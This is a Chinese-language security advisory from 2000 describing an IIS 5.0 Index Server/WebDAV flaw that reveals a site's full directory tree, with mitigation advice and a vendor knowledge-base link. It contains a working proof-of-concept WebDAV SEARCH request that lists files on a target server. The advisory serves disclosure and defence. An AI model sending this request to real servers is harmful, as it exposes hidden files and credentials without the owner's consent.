微软IIS泄漏索引目录的漏洞


微软IIS 5.0泄漏索引目录的漏洞

发布日期: 2000-10-6

更新日期: 2000-10-6
受影响的系统: Microsoft IIS 5.0
+ Microsoft Windows NT 2000


描述:
--------------------------------------------------------------------------------


如果IIS 5.0中的Index Server被允许的话,远程用户就可能察看整个根目录结构以及所有子目录,这是因为WebDAV的查找实现中存在一个缺陷。隐藏目录、包含文件(*.inc)或其它在正常的网站界面中一般不能存取的文档就会由于这个漏洞而泄漏。
成功地利用这个漏洞就可能找到那些可能包含敏感信息如用户名和密码的特定文件。
默认情况下IIS 5.0中的Index Server是被禁止的,只有设置了“Index”属性的目录才会受到这个漏洞的影响。

<* 来源:David Litchfield <dlitchfield@atstake.com> *>

 

测试程序:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!


发送如下的请求给服务器:
SEARCH / HTTP/1.1
Host: target
Content-Type: text/XML
Content-Length: 133

<?XML version="1.0"?>
<g:searchrequest XMLns:g="DAV:">
<g:sql>
Select "DAV:displayname" from scope()
</g:sql>
</g:searchrequest>

 

--------------------------------------------------------------------------------
建议:
临时解决办法:

NSFOCUS建议您使用微软提供的解决方案:
如果您没有使用Index Server(比如您的网站中没有需要查找的内容),禁止或卸载该服务。或者将包含敏感信息的目录的“Index this resource”的选项禁止。

厂商补丁:

微软已发布一篇知识库文章详细描述了这个问题的解决方法,可以在如下的位置找到这篇文章:
http://www.microsoft.com/technet/support/kb.ASP?ID=272079

 

中联绿盟翻译整理,未经许可,不得转载
欢迎访问我们的站点http://www.nsfocus.com/
中联绿盟给您安全的保障 

本文作者:



相关阅读:
网站分析工具中的数据与PPC报告数据不一致的原因
SQL Server 数据库函数库
.htaccess文件保护实例讲解
JavaScript 学习笔记二 字符串拼接
javascript Range对象跨浏览器常用操作
asp提取内容中的手机号码,qq,网址的正则代码
ExtJS 配置和表格控件使用
ASP上传漏洞之利用CHR(0)绕过扩展名检测脚本
超级硬盘杀手的bat
linux 系统中软件raid 配置方法
安装Discuz!7.0.0 的方法与图文教程
Javascript&DHTML基础知识
dos 目录跳转 cd
FreeTextBox 中文版下载[含源代码] of asp.net
快速导航

Copyright © 2016 phpStudy |